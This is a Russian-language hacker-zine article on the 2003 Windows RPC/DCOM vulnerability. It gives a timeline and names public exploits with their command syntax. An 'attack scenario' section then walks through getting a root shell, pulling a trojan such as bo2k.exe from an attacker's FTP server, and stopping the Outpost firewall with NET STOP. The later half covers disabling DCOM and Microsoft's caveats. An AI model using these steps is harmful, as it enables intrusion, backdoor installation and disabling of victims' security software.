|
|
.::DCOM
– проблема решена::.
Сегодняшний наш разговор пойдет о давней, но все же актуальной проблеме.
Это не прсто уязвимость, это была (и есть, повторяю есть!) одна из
огромнейших дыр, оставленной корпорацией Мелкомягких людям компютерного
андерграунда !(да и скрипткиддисам типа «compile and run» достался
лакомый кусочек) =)
Интро:
Для начала все по порядку… Немного хронологии:
16.7.2003: “Last Stage of Delirium” сообщила о найденной уязвимости,
которая проявлялась при обработке DCOM объектов в контексте RPC
протокола. Ничего обычного скажеш ты? Задумайся, ибо сей протокол
используется практически во всех существующих на данный момент версиях
Выньдоус. =0
17.7.2003: Сообщается, что уязвимыми являются все сервисы RPC. Опасности
подвергаются комп′ютеры, с открытыми портами : 135, 139, 445, 593. К
счастью (а может и к сожалению) публичного експлоита выпущено не было –
спасибо (позор!) «LSoD» и «Todd Sabin». В тоже время многие «гуру»
начинают писать приватные експлоиты…
27.7.2003: П***** подкрался незаметно…(с) Аноним ..=) Наконец появляется
техническое описание проблемы. Потные ручки хакеров начиают писать «Армагедец»
для Мелкомягких…
28.7.2003: Понеслось....многочисленные атаки усугубило появление червя
MS Blast…no comments......
Сплоиты:
Dcom (платформа Win-console) – был первенцем, и самым настоящим подарком
для скрипткиддисов. Все что надо было делать Run->cmd->dcom [system ID]
[victim IP] ... усе – ты рут!
Kaht2 (платформа Win-console) – был ударом ниже пояса, сплоит + сканер в
одном флаконе + возможность выполнения макросов (убивание процессов
и.т.д)
Использование Run->cmd->kaht2 [start IP] [end IP]. Дальше работа
невелика – сиди и жди, удача сама тебя найдет =)
RPC Exploit GUI #2(платформа Win) – был контрольным выстрелом. Подумай
сам Графичечкий интерфейс+сканнер определенного диапазона+FTP сервер.
Зачем спросиш ты? Ща объясню...
Сценарий простейшей атаки:
Используя тот же Kaht2 получивши права рута на определенной машине не
следует кидать в бой свои навыки (типа del *.* format c:\......). Лучше
поступим так, чтоб жертва не догадалась о нашем злодеянии.
1. Поставим у себя на машине какой-нить ФТП-сервачок =) (например
GuildFTPd, поищи на Гугле – он фришный)
2. Получив рут прото напросто выполняем следующие команды:
ftp>
open 192.168.1.1 // открываем свою лавку (т.е ФТП-шный сервачок)
Login *** //авторизация
***
get fdisk.exe (а точнее не Fdisk а чтото типа UltraMuz.exe или bo2k.exe
или dick.exe)
bye
Осталось запустить троянчик. Но….не мешало бы проверить комп жертвы на
вшивость (вши имени Касперского, Веба, Панды, ZoneAlarm′а и.т.д). Они уж
очень любят чесным хакерам малинку подпортить. Так что позаботься о
своей сухости в чужой тарелке! =))
Для етого у сплоита Kaht2 есть встроенные макросы (хотя и своих мозгов
должно хватать). Просмотр всех возможных вариантов возможен набиванием
команды «!!» после захвата шелла. =) А можна попробовать что-то типа NET
STOP “OUTPOST”....так ликвидируются всякие «мусора» ситемы (в данном
случае убили ни в чем неповинного файервольчика).
Методы защиты:
Отключение DCOM – самый эффективный способ предотвращения эксплуатации
RPC/DCOM уязвимости. Отключить DCOM можно двумя способами:
1. Через реестр.
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE – измените значение EnableDCOM
к N.
Затем перезагрузите операционную систему.
2. Через утилиту Dcomcnfg.exe. Если вы используете Windows XP или
Windows Server 2003, выполните следующие действия: кликните Component
Services под Console Root
Откройте папку Computers.
Для локального компьютера, кликните правой кнопкой мыши на My Computer и
затем кликните Properties. Для удаленного компьютера, кликните правой
кнопкой мыши на папку Computers, затем new, и затем кликните Computer.
Введите имя компьютера. Правой клавишей мыши на имени компьютера
кликните на Properties. Кликните на закладку Default Properties. Снимите
переключатель (check box) Enable Distributed COM on this Computer.
Кликните Apply, чтобы отключить DCOM.
Перезагрузите операционную систему.
Предупреждение Microsoft об отключении DCOM
В статье Microsoft об отключении DCOM, содержится следующее довольно
неопределенное предупреждение:
Предупреждение, если Вы отключаете DCOM, вы можете потерять
функциональные возможности операционной системы. После того, как вы
отключаете поддержку DCOM, может случится следующее:
Любой COM объект, который может быть активирован дистанционно,
перестанет работать.
Локальный COM+ snap-in не сможет подключаться к удаленным серверам.
Функция авторегистрации сертификатов может неправильно функционировать.
Запросы Windows Management Instrumentation (WMI) удаленных серверов
могут неправильно функционировать.
Потенциально существуют множество встроенных компонентов и сторонних
приложений, которые могут перестать работать, если вы отключите DCOM.
Microsoft рекомендует проверить работоспособность всех приложений,
используемых в вашей среде, после отключения DCOM. Microsoft также
предупреждает, что не во всех средах можно отключить DCOM.
Список приложений, которые требуют DCOM или имеют проблемы при
отключенном DCOM:
-Microsoft Access Workflow Designer
-FrontPage с Visual Source Safe на IIS
-BizTalk Server schedule client
-Excel использует DCOM, если он включает RTD инструкцию
-Win95 требует Client for Microsoft Networks или DCOM, чтобы работать с
MS SNA Server
-Microsoft Exchange Conferencing Server
-Dell entire Open Manage suite
-Veritas Backup Exec, Network based backup. Программа использует
RPC/DCOM для проверки файлов открытых файлов и т.п.
-Citrix NFuse Elite. При отключении DCOM, многие функции Citrix NFuse
перестают функционировать.
-Sophos (Antivirus) Enterprise Manager. Без DCOM программа отказывается
работать.
-Перестают работать множество функций в SMS 2.0 при отключенном DCOM.
|
| 
